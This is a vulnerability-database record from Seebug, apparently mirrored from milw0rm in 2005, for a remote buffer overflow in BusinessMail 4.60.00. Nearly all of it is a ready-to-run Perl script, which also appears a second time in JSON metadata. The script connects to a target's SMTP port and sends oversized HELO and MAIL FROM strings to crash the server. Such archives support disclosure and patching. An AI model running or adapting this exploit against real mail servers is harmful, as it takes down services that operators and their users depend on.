ID SSV:15664
Type seebug
Reporter Root
Modified 2005-07-30T00:00:00
Description
No description provided by source.
#===== Start BusMail_SMTPDOS.pl =====
#
# Usage: BusMail_SMTPDOS.pl <ip>
# BusMail_SMTPDOS.pl 127.0.0.1
#
# BusinessMail email server system 4.60.00
#
# Download:
# http://www.netcplus.com/
#
##########################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "25",
Proto => "TCP"))
{
print "Attempting to kill BusinessMail SMTP server at $ARGV[0]:25...\n";
sleep(1);
print $socket "HELO " . "A" x 512 . "\r\n";
sleep(1);
print $socket "MAIL FROM:" . "A" x 512 . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:25\n";
}
#===== Start BusMail_SMTPDOS.pl =====
# milw0rm.com [2005-07-30]
{"sourceData": "\n #===== Start BusMail_SMTPDOS.pl =====\r\n#\r\n# Usage: BusMail_SMTPDOS.pl <ip>\r\n# BusMail_SMTPDOS.pl 127.0.0.1\r\n#\r\n# BusinessMail email server system 4.60.00\r\n#\r\n# Download:\r\n# http://www.netcplus.com/\r\n#\r\n##########################################\r\n\r\nuse IO::Socket;\r\nuse strict;\r\n\r\nmy($socket) = "";\r\n\r\nif ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],\r\n PeerPort => "25",\r\n Proto => "TCP"))\r\n{\r\n print "Attempting to kill BusinessMail SMTP server at $ARGV[0]:25...\\n";\r\n\r\n sleep(1);\r\n\r\n print $socket "HELO " . "A" x 512 . "\\r\\n";\r\n\r\n sleep(1);\r\n\r\n print $socket "MAIL FROM:" . "A" x 512 . "\\r\\n";\r\n\r\n close($socket);\r\n}\r\nelse\r\n{\r\n print "Cannot connect to $ARGV[0]:25\\n";\r\n}\r\n#===== Start BusMail_SMTPDOS.pl =====\n\n# milw0rm.com [2005-07-30]\n\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-15664", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-15664", "type": "seebug", "viewCount": 2, "references": [], "lastseen": "2017-11-19T22:33:47", "published": "2005-07-30T00:00:00", "cvelist": [], "id": "SSV:15664", "enchantments_done": [], "modified": "2005-07-30T00:00:00", "title": "BusinessMail <= 4.60.00 Remote Buffer Overflow Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2017-11-19T22:33:47", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T22:33:47", "rev": 2}, "vulnersScore": 0.6}}
{}